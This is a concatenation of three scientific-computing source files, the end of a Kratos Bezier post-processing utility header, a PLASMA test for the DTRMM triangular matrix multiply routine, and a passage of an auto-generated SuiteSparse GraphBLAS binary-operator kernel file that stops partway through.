typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
typedef typename NodeType::DofsContainerType DofsContainerType;
typedef UblasSpace<double, CompressedMatrix, Vector> SerialSparseSpaceType;
typedef UblasSpace<double, Matrix, Vector> SerialDenseSpaceType;
typedef LinearSolver<SerialSparseSpaceType, SerialDenseSpaceType> LinearSolverType;
typedef std::size_t IndexType;
/// Pointer definition of BezierPostUtility
KRATOS_CLASS_POINTER_DEFINITION(BezierPostUtility);
///@}
///@name Life Cycle
///@{
/// Default constructor.
BezierPostUtility()
{
}
/// Destructor.
virtual ~BezierPostUtility()
{
}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
// Synchronize post model_part with the reference model_part
template<class TVariableType>
void TransferNodalResults(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ModelPart& r_model_part_post) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
#endif
NodesArrayType& pTargetNodes = r_model_part_post.Nodes();
ElementsArrayType& pElements = r_model_part.Elements();
typename TVariableType::Type Results;
CoordinatesArrayType LocalPos;
int ElementId;
// #pragma omp parallel for
//TODO: check this. This is not parallelized.
for(typename NodesArrayType::ptr_iterator it = pTargetNodes.ptr_begin(); it != pTargetNodes.ptr_end(); ++it)
{
ElementId = (*it)->GetSolutionStepValue(PARENT_ELEMENT_ID);
noalias(LocalPos) = (*it)->GetSolutionStepValue(LOCAL_COORDINATES);
Results = BezierPostUtility_Helper<typename TVariableType::Type>::CalculateOnPoint(rThisVariable, Results, pElements(ElementId), LocalPos);
(*it)->GetSolutionStepValue(rThisVariable) = Results;
}
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer nodal point results for " << rThisVariable.Name() << " completed: " << end_compute - start_compute << " s" << std::endl;
#else
std::cout << "Transfer nodal point results for " << rThisVariable.Name() << " completed" << std::endl;
#endif
}
// Synchronize post model_part with the reference model_part
template<class TVariableType>
void TransferIntegrationPointResults(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ModelPart& r_model_part_post,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
// firstly transfer rThisVariable from integration points of reference model_part to its nodes
TransferVariablesToNodes(pSolver, r_model_part, rThisVariable);
// secondly transfer new nodal variables results to the post model_part
TransferNodalResults(rThisVariable, r_model_part, r_model_part_post);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
// Transfer the variable to nodes for model_part
template<class TVariableType>
void TransferVariablesToNodes(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
TransferVariablesToNodes(pSolver, r_model_part, rThisVariable);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
// Transfer the variable to nodes for model_part
template<class TVariableType>
void TransferVariablesToNodes(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ElementsArrayType& ElementsArray,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
TransferVariablesToNodes(pSolver, r_model_part, ElementsArray, rThisVariable);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
virtual std::string Info() const
{
std::stringstream buffer;
buffer << "BezierPostUtility";
return buffer.str();
}
/// Print information about this object.
virtual void PrintInfo(std::ostream& rOStream) const
{
rOStream << "BezierPostUtility";
}
/// Print object's data.
virtual void PrintData(std::ostream& rOStream) const
{}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
///@}
///@name Private Operators
///@{
///@}
///@name Private Operations
///@{
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that ensures a minimization
* of L_2-norm error (/sum{rThisVariable- f(x)) whereas
* f(x)= /sum{shape_func_i*rThisVariable_i}
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable need to transfer the respected values
* @param check_active if false the activeness of the elements will not be checked; true otherwise
* REMARKS: this subroutine will only transfer the variables to nodes connecting with the mesh defined by ElementsArray
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part, ElementsArrayType& ElementsArray,
const Variable<double>& rThisVariable,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that ensures a minimization
* of L_2-norm error (/sum{rThisVariable- f(x)) whereas
* f(x)= /sum{shape_func_i*rThisVariable_i}
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable need to transfer the respected values
* REMARKS: + this subroutine will transfer the variables to nodes connecting with the model_part. Shall not use this subroutine if there are many types of element in the model_part.
* + the activeness of the element will not be checked
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part,
const Variable<double>& rThisVariable,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that ensures a minimization
* of L_2-norm error (/sum{rThisVariable- f(x)) whereas
* f(x)= /sum{shape_func_i*rThisVariable_i}
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable need to transfer the respected values
* @param ncomponents number of components of the nodal vector
* @param check_active if false the activeness of the elements will not be checked; true otherwise
* REMARKS: this subroutine will only transfer the variables to nodes connecting with the mesh defined by ElementsArray
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part, ElementsArrayType& ElementsArray,
const Variable<Vector>& rThisVariable,
const std::size_t& ncomponents = 6,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that ensures a minimization
* of L_2-norm error (/sum{rThisVariable- f(x)) whereas
* f(x)= /sum{shape_func_i*rThisVariable_i}
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* REMARKS:
* + currently this method only works with 6-components variable like STRESSES, PRESTRESS, etc
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable need to transfer the respected values
* @param ncomponents number of components of the nodal vector
* REMARKS: + this subroutine will transfer the variables to nodes connecting with the model_part. Shall not use this subroutine if there are many types of element in the model_part.
* + the activeness of the element will not be checked
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part,
const Variable<Vector>& rThisVariable,
const std::size_t& ncomponents = 6,
const bool& check_active = false) const;
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
/// Assignment operator.
BezierPostUtility& operator=(BezierPostUtility const& rOther)
{
return *this;
}
/// Copy constructor.
BezierPostUtility(BezierPostUtility const& rOther)
{
}
///@}
}; // Class BezierPostUtility
///@}
template<>
struct BezierPostUtility_Helper<double>
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static double& CalculateOnPoint(const Variable<double>& rVariable,
double& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
template<>
struct BezierPostUtility_Helper<Vector>
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static Vector& CalculateOnPoint(const Variable<Vector>& rVariable,
Vector& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
template<>
struct BezierPostUtility_Helper<array_1d<double, 3> >
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static array_1d<double, 3>& CalculateOnPoint(const Variable<array_1d<double, 3> >& rVariable,
array_1d<double, 3>& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
inline std::istream& operator >>(std::istream& rIStream, BezierPostUtility& rThis)
{
return rIStream;
}
/// output stream function
inline std::ostream& operator <<(std::ostream& rOStream,
const BezierPostUtility& rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@} addtogroup block
}// namespace Kratos.
#undef DEBUG_LEVEL1
#undef DEBUG_LEVEL2
#undef DEBUG_MULTISOLVE
#undef DEBUG_GENERATE_MESH
#undef ENABLE_PROFILING
#endif
|
testing_dtrmm.c | /**
*
* @file testing_dtrmm.c
*
* PLASMA testing routines
* PLASMA is a software package provided by Univ. of Tennessee,
* Univ. of California Berkeley and Univ. of Colorado Denver
*
* @version 2.6.0
* @author Mathieu Faverge
* @date 2010-11-15
* @generated d Tue Jan 7 11:45:19 2014
*
**/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <plasma.h>
#include <cblas.h>
#include <lapacke.h>
#include "core_blas.h"
#include "testing_dmain.h"
#undef COMPLEX
#define REAL
static int check_solution(PLASMA_enum side, PLASMA_enum uplo, PLASMA_enum trans, PLASMA_enum diag,
int M, int N, double alpha,
double *A, int LDA,
double *Bref, double *Bplasma, int LDB);
int testing_dtrmm(int argc, char **argv)
{
/* Check for number of arguments*/
if ( argc != 5 ) {
USAGE("TRMM", "alpha M N LDA LDB",
" - alpha : alpha coefficient\n"
" - M : number of rows of matrices B\n"
" - N : number of columns of matrices B\n"
" - LDA : leading dimension of matrix A\n"
" - LDB : leading dimension of matrix B\n");
return -1;
}
double alpha = (double) atol(argv[0]);
int M = atoi(argv[1]);
int N = atoi(argv[2]);
int LDA = atoi(argv[3]);
int LDB = atoi(argv[4]);
double eps;
int info_solution;
int s, u, t, d, i;
int LDAxM = LDA*max(M,N);
int LDBxN = LDB*max(M,N);
double *A = (double *)malloc(LDAxM*sizeof(double));
#pragma omp register([LDAxM]A)
double *B = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]B)
double *Binit = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]Binit)
double *Bfinal = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]Bfinal)
/* Check if unable to allocate memory */
if ( (!A) || (!B) || (!Binit) || (!Bfinal)){
printf("Out of Memory \n ");
return -2;
}
eps = LAPACKE_dlamch_work('e');
printf("\n");
printf("------ TESTS FOR PLASMA DTRMM ROUTINE ------- \n");
printf(" Size of the Matrix B : %d by %d\n", M, N);
printf("\n");
printf(" The matrix A is randomly generated for each test.\n");
printf("============\n");
printf(" The relative machine precision (eps) is to be %e \n",eps);
printf(" Computational tests pass if scaled residuals are less than 10.\n");
/*----------------------------------------------------------
* TESTING DTRMM
*/
/* Initialize A, B, C */
LAPACKE_dlarnv_work(IONE, ISEED, LDAxM, A);
LAPACKE_dlarnv_work(IONE, ISEED, LDBxN, B);
for(i=0;i<max(M,N);i++)
A[LDA*i+i] = A[LDA*i+i] + 2.0;
for (s=0; s<2; s++) {
for (u=0; u<2; u++) {
#ifdef COMPLEX
for (t=0; t<3; t++) {
#else
for (t=0; t<2; t++) {
#endif
for (d=0; d<2; d++) {
memcpy(Binit, B, LDBxN*sizeof(double));
memcpy(Bfinal, B, LDBxN*sizeof(double));
/* PLASMA DTRMM */
PLASMA_dtrmm(side[s], uplo[u], trans[t], diag[d],
M, N, alpha, A, LDA, Bfinal, LDB);
/* Check the solution */
info_solution = check_solution(side[s], uplo[u], trans[t], diag[d],
M, N, alpha, A, LDA, Binit, Bfinal, LDB);
printf("***************************************************\n");
if (info_solution == 0) {
printf(" ---- TESTING DTRMM (%s, %s, %s, %s) ...... PASSED !\n",
sidestr[s], uplostr[u], transstr[t], diagstr[d]);
}
else {
printf(" ---- TESTING DTRMM (%s, %s, %s, %s) ... FAILED !\n",
sidestr[s], uplostr[u], transstr[t], diagstr[d]);
}
printf("***************************************************\n");
}
}
}
}
free(A); free(B);
free(Binit); free(Bfinal);
return 0;
}
/*--------------------------------------------------------------
* Check the solution
*/
static int check_solution(PLASMA_enum side, PLASMA_enum uplo, PLASMA_enum trans, PLASMA_enum diag,
int M, int N, double alpha,
double *A, int LDA,
double *Bref, double *Bplasma, int LDB)
{
int info_solution;
double Anorm, Binitnorm, Bplasmanorm, Blapacknorm, Rnorm, result;
double eps;
double mzone = (double)-1.0;
double *work = (double *)malloc(max(M, N)* sizeof(double));
int Am, An;
if (side == PlasmaLeft) {
Am = M; An = M;
} else {
Am = N; An = N;
}
Anorm = LAPACKE_dlantr_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), lapack_const(uplo), lapack_const(diag),
Am, An, A, LDA, work);
Binitnorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
Bplasmanorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bplasma, LDB, work);
cblas_dtrmm(CblasColMajor, (CBLAS_SIDE)side, (CBLAS_UPLO)uplo, (CBLAS_TRANSPOSE)trans,
(CBLAS_DIAG)diag, M, N, (alpha), A, LDA, Bref, LDB);
Blapacknorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
cblas_daxpy(LDB * N, (mzone), Bplasma, 1, Bref, 1);
Rnorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
eps = LAPACKE_dlamch_work('e');
printf("Rnorm %e, Anorm %e, Binitnorm %e, Bplasmanorm %e, Blapacknorm %e\n",
Rnorm, Anorm, Binitnorm, Bplasmanorm, Blapacknorm);
result = Rnorm / ((Anorm + Blapacknorm) * max(M,N) * eps);
printf("============\n");
printf("Checking the norm of the difference against reference DTRMM \n");
printf("-- ||Cplasma - Clapack||_oo/((||A||_oo+||B||_oo).N.eps) = %e \n", result);
if ( isinf(Blapacknorm) || isinf(Bplasmanorm) || isnan(result) || isinf(result) || (result > 10.0) ) {
printf("-- The solution is suspicious ! \n");
info_solution = 1;
}
else {
printf("-- The solution is CORRECT ! \n");
info_solution= 0 ;
}
free(work);
return info_solution;
}
|
GB_binop__second_fc64.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_08__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_02__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_04__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__second_fc64)
// A*D function (colscale): GB (_AxD__second_fc64)
// D*A function (rowscale): GB (_DxB__second_fc64)
// C+=B function (dense accum): GB (_Cdense_accumB__second_fc64)
// C+=b function (dense accum): GB (_Cdense_accumb__second_fc64)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__second_fc64)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: GxB_FC64_t
// A type: GxB_FC64_t
// A pattern? 1
// B type: GxB_FC64_t
// B pattern? 0
// BinaryOp: cij = bij
#define GB_ATYPE \
GxB_FC64_t
#define GB_BTYPE \
GxB_FC64_t
#define GB_CTYPE \
GxB_FC64_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
;
// true if values of A are not used
#define GB_A_IS_PATTERN \
1 \
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
GxB_FC64_t bij = GBX (Bx, pB, B_iso)
// true if values of B are not used
#define GB_B_IS_PATTERN \
0 \
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
GxB_FC64_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = y ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
1
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_SECOND || GxB_NO_FC64 || GxB_NO_SECOND_FC64)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__second_fc64)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type GxB_FC64_t
GxB_FC64_t bwork = (*((GxB_FC64_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *restrict Cx = (GxB_FC64_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *restrict Cx = (GxB_FC64_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__second_fc64)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
GxB_FC64_t alpha_scalar ;
GxB_FC64_t beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((GxB_FC64_t *) alpha_scalar_in)) ;
beta_scalar = (*((GxB_FC64_t *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__second_fc64)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__second_fc64)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *Cx = (GxB_FC64_t *) Cx_output ;
GxB_FC64_t x = (*((GxB_FC64_t *) x_input)) ;
GxB_FC64_t *Bx = (GxB_FC64_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
GxB_FC64_t bij = GBX (Bx, p, false) ;
Cx [p] = bij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
GxB_FC64_t *Cx = (GxB_FC64_t *) Cx_output ;
GxB_FC64_t *Ax = (GxB_FC64_t *) Ax_input ;
GxB_FC64_t y = (*((GxB_FC64_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
; ;
Cx [p] = y ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
GxB_FC64_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC64_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t x = (*((const GxB_FC64_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC64_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
